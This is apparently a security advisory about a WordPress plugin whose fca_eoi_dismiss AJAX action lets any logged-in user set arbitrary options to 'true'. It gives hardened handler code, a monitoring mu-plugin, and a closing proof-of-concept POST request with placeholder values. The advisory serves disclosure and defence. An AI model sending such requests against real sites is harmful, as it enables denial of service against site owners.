Once the site has recorded at least 25 conversions through the plugin, a notice is shown in the administration panel to all logged-in users, regardless of their role.

Clicking the "Dismiss" button invokes the `fca_eoi_dismiss` AJAX action with two parameters: `nonce` and `option`.

The `option` parameter is not sanitized before it is used in this line of code:

# campaign-monitor-wp/includes/eoi-post-types.php, line 1938
if ( update_option( $option, 'true' ) ) {

Since the AJAX action's callback performs no additional privilege checks, an attacker with a Subscriber or higher role can set any WordPress option to the value `true`.
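The nonce does not help here: the notice is rendered for every logged-in user, so every logged-in user can read a valid nonce out of the page. A nonce is a CSRF control, not an authorization control, and the handler needs a capability check plus an allowlist of option names on top of it. The following hardened handler is an added example written for this advisory, not the plugin's own code or its fix; the nonce action name `fca_eoi_dismiss_notice`, the option name `fca_eoi_conversion_notice_dismissed` and the `manage_options` capability are assumptions.

```php
<?php
// Added example: hardened form of a "dismiss notice" AJAX handler.
// Not the plugin's code. Hook name, nonce action, allowlist and the
// capability are assumptions chosen for illustration.

// The only option names this endpoint may ever write. Everything else is
// rejected, so keys such as siteurl, default_role or active_plugins are
// out of reach no matter what the request carries.
const FCA_EOI_DISMISSIBLE_OPTIONS = array(
    'fca_eoi_conversion_notice_dismissed', // assumed name
);

function fca_eoi_dismiss_hardened() {
    // 1. CSRF: bind the request to a nonce issued for this specific action.
    //    With the default $stop = true, a bad nonce ends the request with
    //    HTTP 403 before any of the code below runs.
    check_ajax_referer( 'fca_eoi_dismiss_notice', 'nonce' );

    // 2. Authorization: dismissing an admin notice is an administrative act,
    //    so require a capability rather than "any logged-in user".
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    // 3. Input validation: normalise, then allowlist. sanitize_key() on its
    //    own is not a fix, because 'siteurl' is already a valid key; the
    //    strict in_array() against a fixed list is what closes the hole.
    $option = isset( $_POST['option'] )
        ? sanitize_key( wp_unslash( $_POST['option'] ) )
        : '';
    if ( ! in_array( $option, FCA_EOI_DISMISSIBLE_OPTIONS, true ) ) {
        wp_send_json_error( array( 'message' => 'unknown option' ), 400 );
    }

    // 4. Only now touch wp_options. update_option() returns false when the
    //    stored value is already 'true', which is not an error for a
    //    dismiss action, so the return value is deliberately ignored.
    update_option( $option, 'true' );
    wp_send_json_success();
}
add_action( 'wp_ajax_fca_eoi_dismiss', 'fca_eoi_dismiss_hardened' );
```

The order of the checks matters: nonce first (cheap, rejects cross-site requests), capability second (rejects low-privilege accounts), allowlist last (rejects everything the endpoint was never meant to write). Each check alone leaves a path open; the allowlist is the one that turns "any option" into "this one option".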

Being restricted to the value `true` rules out the usual attacks such as changing the site URL or the default role for new users, but the flaw is easily used to cause a denial of service by overwriting options belonging to plugins, themes or WordPress core.
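Until the plugin is updated, a site owner can log and block this class of write from outside the vulnerable plugin. The must-use plugin below is an added example for this advisory, not code from the plugin or from WordPress; it uses the core `pre_update_option` filter, which runs inside `update_option()` before the value is stored. The list of protected option names and the log line format are assumptions to be adjusted per site.

```php
<?php
/**
 * Plugin Name: Option write monitor (added example, not the plugin's code)
 *
 * Drop into wp-content/mu-plugins/ to log and block writes to sensitive
 * wp_options keys that happen during admin-ajax.php requests issued by
 * users without manage_options. Intended as a temporary control while the
 * vulnerable plugin is updated; the key list below is an assumption.
 */

// Core options whose overwrite with a bogus value such as 'true' breaks the
// site or its security posture. Extend with plugin/theme keys that matter
// on the specific install.
function owm_sensitive_options() {
    return array(
        'siteurl', 'home', 'active_plugins', 'template', 'stylesheet',
        'default_role', 'users_can_register', 'admin_email',
    );
}

function owm_guard_option_write( $value, $option, $old_value ) {
    // Only AJAX-driven writes by low-privilege users are of interest;
    // normal administrative saves pass through untouched.
    if ( ! wp_doing_ajax() || current_user_can( 'manage_options' ) ) {
        return $value;
    }
    if ( ! in_array( $option, owm_sensitive_options(), true ) ) {
        return $value;
    }

    // Record who tried to write what through which AJAX action, so the
    // event is visible in the PHP error log for alerting and forensics.
    $user   = wp_get_current_user();
    $action = isset( $_REQUEST['action'] )
        ? sanitize_key( wp_unslash( $_REQUEST['action'] ) )
        : '(none)';
    $remote = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '?';
    error_log( sprintf(
        'owm: blocked write to option "%s" via ajax action "%s" by user %d (%s) from %s',
        $option, $action, $user->ID, $user->user_login, $remote
    ) );

    // Returning the old value makes update_option() compare equal values
    // and return false without touching the database, so the write is
    // neutralised rather than merely logged.
    return $old_value;
}
add_filter( 'pre_update_option', 'owm_guard_option_write', 10, 3 );
```

Because the filter keys on the request being AJAX and the user lacking `manage_options`, it catches the pattern the advisory describes (a Subscriber driving `admin-ajax.php`) without interfering with legitimate settings saves. The resulting log lines carry the option name and the `action` parameter, which is what a detection rule or a grep during incident triage would match on.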

POST /wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69

action=fca_eoi_dismiss&option=<THE OPTION YOU WANT TO SET TO TRUE>&nonce=<YOUR NONCE>